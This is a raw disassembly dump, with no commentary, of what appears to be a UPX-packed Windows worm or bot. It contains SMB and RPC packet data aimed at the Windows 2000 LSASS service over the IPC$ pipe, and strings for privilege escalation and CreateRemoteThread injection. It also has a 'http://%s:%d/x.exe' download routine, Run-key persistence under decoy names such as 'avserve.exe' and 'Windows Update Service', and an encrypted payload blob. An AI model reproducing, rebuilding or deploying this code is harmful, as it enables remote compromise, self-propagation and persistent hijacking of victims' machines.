dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_314345A8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_314319BC+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31434634 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_314346E0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_314347C0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_314319BC+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31434824 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31434890 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31434934 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_314349B4 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_314319BC+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31434A48 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31434AB4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31434B28 dd 0 ; DATA XREF: sub_314319BC+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31434BE6 dd 1004600h ; DATA XREF: sub_314319BC+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31434C20 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_314319BC+41B�o
; sub_314319BC+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31434C98: ; DATA XREF: sub_314319BC+44A�o
jmp short loc_31434CA0
; ---------------------------------------------------------------------------
jmp short loc_31434CA2
; ---------------------------------------------------------------------------
align 10h
loc_31434CA0: ; CODE XREF: UPX0:loc_31434C98�j
; DATA XREF: sub_314319BC+5C�o
pop esp
pop esp
loc_31434CA2: ; CODE XREF: UPX0:31434C9A�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31434CAC dd 1CEC8166h ; DATA XREF: sub_314319BC+D�r
dword_31434CB0 dd 0E4FF07h ; DATA XREF: sub_314319BC+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31431F23+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31431F23+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31431F23+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31431F23+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31431F23+8�o
; sub_3143256D+13A�o
align 4
aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31431FAB:loc_31432090�o
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31431FAB+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31431FAB:loc_31431FF2�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31431FAB+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31431FAB+18�o
align 4
dword_31434D64 dd 0E9F3F5h ; DATA XREF: sub_31432239+112�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31432239+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_31432239+3D�o
aUterm20 db 'uterm20',0 ; DATA XREF: UPX0:3143250C�o
; sub_3143256D+148�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:314324F7�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_3143256D+141�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3143256D+133�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_3143256D+12C�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3143256D+11F�o
align 10h
aU20x db 'u20x',0 ; DATA XREF: sub_3143256D+CB�o
align 4
aU20 db 'u20',0 ; DATA XREF: sub_3143256D+C4�o
aU19 db 'u19',0 ; DATA XREF: sub_3143256D+BD�o
aU18 db 'u18',0 ; DATA XREF: sub_3143256D+B6�o
aU17 db 'u17',0 ; DATA XREF: sub_3143256D+AF�o
aU16 db 'u16',0 ; DATA XREF: sub_3143256D+A8�o
aU15 db 'u15',0 ; DATA XREF: sub_3143256D+A1�o
aU14 db 'u14',0 ; DATA XREF: sub_3143256D+9A�o
aU13i db 'u13i',0 ; DATA XREF: sub_3143256D+93�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_3143256D+8C�o
aU12 db 'u12',0 ; DATA XREF: sub_3143256D+85�o
aU11 db 'u11',0 ; DATA XREF: sub_3143256D+7E�o
aU10 db 'u10',0 ; DATA XREF: sub_3143256D+77�o
aU9 db 'u9',0 ; DATA XREF: sub_3143256D+70�o
align 10h
aU8 db 'u8',0 ; DATA XREF: sub_3143256D+69�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_3143256D+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_3143256D+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_3143256D+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_3143256D+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3143256D+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_3143256D+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3143256D+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_3143256D+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3143256D+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_3143256D+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_314328D7+2D�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3143237F+23�o
; sub_31432BAD+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_3143237F+1C�o
; sub_31432C62+87�o ...
align 10h
aJaeanaakqdhgry db 'jaeanaakqdhgryp',0 ; DATA XREF: sub_31431782+4F�o
; sub_31432D2E+57�o ...
dd 2 dup(0)
aSoftwareMicr_1 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31432D2E+32�o
aClient db 'Client',0 ; DATA XREF: sub_31432D2E+BC�o
; sub_31432D2E+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31432D2E+37�o
; sub_31432D2E+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31432BAD+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31432BAD+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31432BAD+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31432BAD+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31432BAD+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31432BAD+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31432BAD+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31432BAD+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31432BAD+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31432BAD+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31432BAD+F�o
align 4
a1: ; DATA XREF: sub_31432D2E+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31435028 dd 0 ; DATA XREF: sub_31432239+C7�r
; sub_3143237F+80�w
dword_3143502C dd 0 ; DATA XREF: sub_31431782+43�r
; sub_3143185D+53�o ...
dword_31435030 dd 0 ; DATA XREF: sub_31432239+79�r
; sub_31432239:loc_314322E7�r ...
dword_31435034 dd 44h ; DATA XREF: sub_31431FAB+C2�r
; UPX0:31432517�w ...
dword_31435038 dd 0 ; DATA XREF: sub_31432559+2�r
; sub_3143256D+DC�w
dword_3143503C dd 0 ; DATA XREF: sub_3143237F+E0�w
; sub_314328D7+20�r
dword_31435040 dd 31430000h ; DATA XREF: sub_31431FAB+6�r
; UPX0:314324FC�w
dword_31435044 dd 0 ; DATA XREF: sub_31431782+49�r
; sub_3143185D+4A�o ...
dword_31435048 dd 0 ; DATA XREF: sub_3143141F+30E�r
; UPX0:31432974�w ...
dword_3143504C dd 0 ; DATA XREF: sub_3143141F:loc_31431744�o
; sub_31432728+41�r ...
dword_31435050 dd 0 ; DATA XREF: sub_31432D2E+25�w
; sub_31432D2E+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31436000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31436000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31437C81�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 4C746547h
dd 45747361h, 726F7272h, 72570100h, 46657469h, 656C69h
dd 6F6C4301h, 61486573h, 656C646Eh, 72430100h, 65746165h
dd 656C6946h, 6C010041h, 6C727473h, 416E65h, 74736C01h
dd 74616372h, 47010041h, 79537465h, 6D657473h, 65726944h
dd 726F7463h, 1004179h, 65746E49h, 636F6C72h, 4564656Bh
dd 61686378h, 65676Eh, 74654701h, 61636F4Ch, 6E49656Ch
dd 416F66h, 656C5301h, 1007065h, 7274736Ch, 6E797063h
dd 47010041h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 65470100h, 6F725074h, 64644163h, 73736572h, 6F4C0100h
dd 694C6461h, 72617262h, 1004179h, 74697257h, 6F725065h
dd 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh, 636F7250h
dd 737365h, 74654701h, 75646F4Dh, 6148656Ch, 656C646Eh
dd 47010041h, 69547465h, 6F436B63h, 746E75h, 65724301h
dd 4D657461h, 78657475h, 43010041h, 74616572h, 72685465h
dd 646165h, 65724301h, 50657461h, 65636F72h, 417373h, 74655301h
dd 6E657645h, 4F010074h, 456E6570h, 746E6576h, 45010041h
dd 54746978h, 61657268h, 49010064h, 7265746Eh, 6B636F6Ch
dd 6E496465h, 6D657263h, 746E65h, 61655201h, 6C694664h
dd 47010065h, 69467465h, 6953656Ch, 100657Ah, 74697845h
dd 636F7250h, 737365h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 6F746101h, 73010069h, 68637274h
dd 0E9000072h, 14000000h, 1000001h, 646E6946h, 646E6957h
dd 41776Fh, 74654701h, 65726F46h, 756F7267h, 6957646Eh
dd 776F646Eh, 65470100h, 6E695774h, 54776F64h, 61657268h
dd 6F725064h, 73736563h, 1006449h, 72707377h, 66746E69h
dd 0F4000041h, 28000000h, 1000001h, 65746E49h, 74656E72h
dd 6E65704Fh, 416C7255h, 6E490100h, 6E726574h, 704F7465h
dd 416E65h, 746E4901h, 656E7265h, 6F6C4374h, 61486573h
dd 656C646Eh, 6E490100h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 746E4901h, 656E7265h
dd 61655274h, 6C694664h, 65h, 40000001h, 0FF000001h, 2FF0073h
dd 0DFF00h, 0FF0001FFh, 6FFF0039h, 34FF00h, 0FF0017FFh
dd 9FF000Ch, 4FF00h, 0FF0013FFh, 16FF0010h, 3FF00h, 0
dd 455000h, 2014C00h, 0E07ED200h, 40h, 0
dd 0F00E000h, 6010B01h, 280000h, 120000h, 0
dd 24EF00h, 100000h, 400000h, 43000000h, 100031h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 2F0400h, 8C00h, 14h dup(0)
dd 100000h, 18000h, 6 dup(0)
dd 65742E00h, 7478h, 263200h, 100000h, 280000h, 40000h
dd 3 dup(0)
dd 4002000h, 61642EE0h, 6174h, 105400h, 400000h, 120000h
dd 2C0000h, 3 dup(0)
dd 4000h, 5000C0h, 311000h, 54C900h, 57965900h, 6849FAFAh
dd 0B7000E29h, 844F4CCFh, 0A2623FE0h, 0DC24106Ah, 0DED1BA53h
dd 44810B66h, 5F0DC766h, 0B73BD68h, 0E4D6E6CDh, 0DE196664h
dd 164C2621h, 0FC5644DEh, 31E07589h, 51B36968h, 3EA2E2Eh
dd 0C8BF9C37h, 0E89C3A7h, 6CD8E087h, 770D7C13h, 0A8433716h
dd 18D3B345h, 9B6BDB07h, 0F88C0D0Bh, 49190640h, 73F27046h
dd 6A9821CDh, 4634332Eh, 17273C8h, 37E0DE64h, 3010CCDFh
dd 8C0F4608h, 0D0BD8027h, 740B89E5h, 0C5803126h, 43089D01h
dd 0D0EECD70h, 0BC3C0007h, 115690F0h, 0B66061EEh, 0AA425F0Ch
dd 0C1FF15Ch, 11784396h, 0C9EC0CB3h, 9705C87Ch, 0F8786E0Ah
dd 894BE6A1h, 25620546h, 0DA46568h, 0AEC28B6Dh, 92A2043Bh
dd 3CF01Ch, 27BE83Bh, 100BC86Ah, 4824A32Eh, 86024A19h
dd 0A0CF6043h, 2163390h, 0B9AEBB03h, 0A73D7D95h, 769F6801h
dd 664A48E6h, 3A21B736h, 1B5AB7CCh, 3DB9A4E0h, 6A7684E4h
dd 96F42A70h, 364719B4h, 5EC86007h, 7A97640Ah, 39F0D92Eh
dd 0A2280084h, 3C4B283Fh, 0CDCB59B2h, 98B9B26Ch, 23BDEBE2h
dd 0DC0167A7h, 0C77E500Fh, 0BE1F218Dh, 0AC68F60Eh, 0D328C00Dh
dd 0C676E6C9h, 0E57A08A1h, 0DB0C7A04h, 0C8611488h, 2DC54C20h
dd 6C84BF34h, 2EDB1CD6h, 0B698DE40h, 4192FC84h, 40BCDE44h
dd 0C27190D6h, 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh
dd 67E9ACF9h, 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h
dd 1CF25B07h, 96F41276h, 0A19DE9C3h, 4F0CEF1Bh, 7BC87C6Ah
dd 64B1E3C3h, 0C9BE4934h, 991DD27Bh, 90E154E4h, 0B42DE924h
dd 48B9B999h, 0EDCF7881h, 0C80A5848h, 0CF88286h, 6633F415h
dd 2665846h, 7808747Ah, 41BA9D5Fh, 5FF4C65Eh, 7D1C0F8Ah
dd 9C1369E0h, 0AC204D0Ch, 0C0A8357Fh, 5F68683h, 572448F8h
dd 565FC937h, 5A7457D8h, 74F80E14h, 0B8C8684Bh, 0CA8950BAh
dd 0E83D7496h, 4B4B3F6Ch, 0A44120C9h, 0FFC55FFh, 0F6B9ADE8h
dd 50E4B92Ch, 0E9628ACh, 0CCDA6AD9h, 0F81B02F0h, 0E48C0009h
dd 81DB40ACh, 42F47558h, 29C587EEh, 8B181F13h, 6701400Dh
dd 0BFEEFFB6h, 3C418B2Fh, 68C10357h, 488B9758h, 50788B34h
dd 0A0F44D89h, 8D759CB8h, 1BDBD84Bh, 0BEF09153h, 0B002F0ACh
dd 4751EB01h, 0ED74EC12h, 1AC55A0Ch, 0D7240Dh, 9300CA82h
dd 18090E6Dh, 0B22ECDEh, 0F84DAFDFh, 1C185051h, 412A6897h
dd 8958D8ABh, 60FE5DB4h, 0CAD2C68Bh, 1C346B03h, 0B7680630h
dd 59AB1976h, 0BE7DF055h, 135BAB62h, 0F03E45E6h, 0DC50EF51h
dd 34EC5F13h, 34A110B0h, 0FFFAD6BDh, 172783C4h, 5577D06Ah
dd 74C73BECh, 805F8C78h, 1BEB1605h, 684D1868h, 3959E010h
dd 0E5CC857h, 8D405FCh, 0F8041D74h, 0FC58EFA2h, 4251511Dh
dd 2F0DC32Bh, 69310F60h, 41B60D10h, 0BC258964h, 22B1AFDDh
dd 138575D6h, 590FECB2h, 5D33DB2Dh, 6AF9C267h, 803CC0B6h
dd 624EE90Ch, 50A85089h, 0C42C507Dh, 0AC297488h, 8020195Dh
dd 0B3F8B55Bh, 7C8B5743h, 57D21424h, 67FFF7Eh, 1A87178Bh
dd 8861C280h, 3B461E14h, 80E97CF7h, 0E030E036h, 4A003B24h
dd 86444954h, 2EDB78CEh, 57AC5A5Fh, 2166DB56h, 303A5DCh
dd 0F0DC732Fh, 25B81950h, 648D62h, 0E377ACAAh, 954D04F0h
dd 49F408C8h, 0DBA32668h, 0F00CFADAh, 3408C7FFh, 0DA65B27Bh
dd 2E2ACC34h, 0A0A7550h, 666B5CE8h, 1A20BC54h, 0B7ED5818h
dd 7C64F85h, 13B7FB8h, 0C408B14h, 2C01008Bh, 86F8E76h
dd 24448D51h, 1134215Fh, 9A7C2D3h, 245903DBh, 0BBD01507h
dd 7743A19Eh, 2FCC2007h, 3233E433h, 0F8C83FDBh, 8510E7C1h
dd 0A05B60Bh, 200CD86h, 0CF125D8Bh, 1C0BABECh, 7FC20099h
dd 7B55C653h, 139E2416h, 0C0934521h, 25AAECF0h, 6E5D868h
dd 5B4ECF20h, 17B5ADE7h, 675641F0h, 35953336h, 0A33D986Ch
dd 8CC6EC66h, 503044B7h, 0B370FE47h, 4D80C581h, 0EBDA14A5h
dd 54B3174Eh, 0A134007Ch, 37FBAE33h, 7900B9F0h, 0C13BC72Bh
dd 0C18B0272h, 0FC292BE1h, 0A1DDBDDDh, 0C7031828h, 1374AC23h
dd 1172233Dh, 4678516Ah, 40F8784Bh, 0EC13C4EBh, 0E1B462D9h
dd 0D8117750h, 0DC9A941Eh, 68159E4Dh, 68030B68h, 9B6B3A64h
dd 3A3C97C5h, 8F535453h, 52CC7D18h, 9824D483h, 0C423347Dh
dd 30DE04C2h, 4FB2F457h, 0B1B1087Dh, 0E868C3D0h, 168EE4Eh
dd 0B8BAAFDEh, 89FF6806h, 0ED04841Dh, 0D4244BA9h, 539100F2h
dd 9886937Bh, 3A01026Dh, 1CD680A6h, 0FD775A8Dh, 0E741A4Dh
dd 2F6946CFh, 0CA3E0CDh, 0ACEF4BC2h, 0A4FEA365h, 565153FCh
dd 635B3A5Bh, 68DC3A86h, 87DF2656h, 5EF9119Bh, 10C25C19h
dd 1B4D424Ch, 56C05E05h, 9DFD0C4Bh, 89E8D2F4h, 50DEC5Dh
dd 1FFF25FFh, 0BEEC1BFDh, 0A3C33A04h, 0E774433Ch, 84CC8A1Fh
dd 50DF74C9h, 937ABE3h, 5F42EA6Bh, 4C85A544h, 646530B7h
dd 0B97B480Ch, 5F7D35FBh, 1FD814F8h, 68B1114Ch, 0D9C22239h
dd 9111D5Bh, 53E2EB62h, 0CC455FCFh, 4384B982h, 0B6700190h
dd 0AE3AF759h, 0D6B03340h, 36023E11h, 0E687A60Fh, 0B8803AD6h
dd 3044E468h, 0A3AB1B63h, 7C74E040h, 4AB27633h, 34A37B69h
dd 767B781Ah, 0B73D6182h, 29E44552h, 43041F0Fh, 1BB37D9Ch
dd 682A1DA9h, 0A713256Dh, 13ED7ED1h, 1586EB0Dh, 35699969h
dd 0AC188438h, 397044C6h, 4B104D40h, 0D290E409h, 3372396Ch
dd 88454ADCh, 8C06EF9Ch, 238C9094h, 941C8E47h, 9C7C9884h
dd 0E472A074h, 0A46C91C8h, 0AC5CA864h, 1C8E4754h, 0B450B039h
dd 0BC48B84Ch, 91C8E444h, 0C440C023h, 8E34C83Ch, 0CC72391Ch
dd 0D42CD030h, 0C724D828h, 0DC472391h, 0E41CE020h, 76CD9018h
dd 9C10C780h, 0A36CE145h, 7ADB72F1h, 2FCBEECh, 730A8384h
dd 0B806ED12h, 4F8442B4h, 59B8885h, 9B0CFF59h, 0EBD9C870h
dd 0B00E1AE8h, 0E0F91A6Ah, 95391A17h, 8683974h, 32ACB94Eh
dd 45936C72h, 0F8064E00h, 21760C4Dh, 0A8F07261h, 49BF140Ah
dd 79B7676Eh, 0EF15237Fh, 0F1185D0Ah, 33C822E0h, 559C5029h
dd 0D747E90Fh, 18B4146Dh, 0AA138806h, 1412E3EBh, 17A7049Eh
dd 0DBA3BD23h, 63123818h, 7FA48071h, 8FD5BDh, 458A4FBBh
dd 0FF77530Bh, 83DBDB32h, 3A518701h, 5D3831D9h, 0E93125DBh
dd 5D88E291h, 0B8099D0Bh, 80CF1559h, 4CB72CDFh, 0F1F7D233h
dd 0FE9BD103h, 0CB65EBC3h, 0FFFB80F8h, 60C6BD72h, 1C0F5674h
dd 7A303876h, 41586667h, 4F870ADBh, 40A7F05h, 3B6B3618h
dd 9A0B0918h, 17692573h, 0F758BECh, 37272804h, 0AC01D0C8h
dd 8147822Bh, 6CE27695h, 4C9FA16Ah, 7A595D5Eh, 2CD74CAEh
dd 0F0A26472h, 7832DB7Ch, 0FD720A2Eh, 35F8FF04h, 0FEF42Fh
dd 0F7887F3Ch, 0B18BB06Ah, 4D8B6C3h, 0A9DCFD3Bh, 0EC04A23Eh
dd 579F6764h, 9B572F9Dh, 4B3DB21Ch, 1359F8E0h, 4A36FF8Ah
dd 0B2C54ADCh, 68FCEE75h, 0C8EC3C27h, 0BDD3A21Ah, 70849ED3h
dd 1C180961h, 4C5AA537h, 52AD630h, 508FCC4Fh, 18B6BD78h
dd 0FC68BAE3h, 67B7C156h, 0B3C443Eh, 0A468B003h, 0DCB71E4Eh
dd 11104580h, 6842E231h, 12F7D70h, 0B80C613h, 0C0B343DFh
dd 5579BB02h, 8E579756h, 663C344h, 4D1DE6BCh, 30E26CA4h
dd 0FD1F0C43h, 53146CF4h, 483776CDh, 20BF66Bh, 4838506Ah
dd 76D9A65Dh, 0D005C7DFh, 1974F896h, 9D01480Bh, 0BDDCCE60h
dd 141A055Eh
dd 0E103D851h, 1806DE27h, 0C9FB81D3h, 0D6530D74h, 0B6844203h
dd 1D1053C7h, 0DB04C3Bh, 1824C37Dh, 0ED85ED3Ch, 10B1117Eh
dd 0EED82C28h, 144DEDB0h, 0A40598EFh, 200DF2EBh, 75324B74h
dd 6DDEB65h, 0EB45C0B0h, 27D53F68h, 60B11BA2h, 0B5150C64h
dd 43A5106Fh, 14083BE8h, 6CD7513Bh, 18D4C859h, 18430856h
dd 31883EF6h, 3D566C2Eh, 0A52ADC74h, 4DE702DBh, 2050DF61h
dd 4E05B110h, 3081896h, 6B0F5EB6h, 557E2CD1h, 0FAEDC68Bh
dd 6764C82Eh, 532C56ADh, 67005556h, 270C422Dh, 0C520A31h
dd 2C81C931h, 0C45D0C04h, 0BB679061h, 0E0530128h, 0F40B89FBh
dd 8E3D4E2Dh, 1E3C4094h, 1F10365Ch, 794E7A1Ch, 0F8E510F7h
dd 0EB778B64h, 687AA239h, 17D86635h, 0B13B3Bh, 2005C710h
dd 0A24F7789h, 7DF21E99h, 1E748D47h, 0BD02609Bh, 0AE48FCA2h
dd 0FE8194DCh, 0B5FF1C2Ah, 0FFF51EFh, 0E6CCCD1Fh, 60085282h
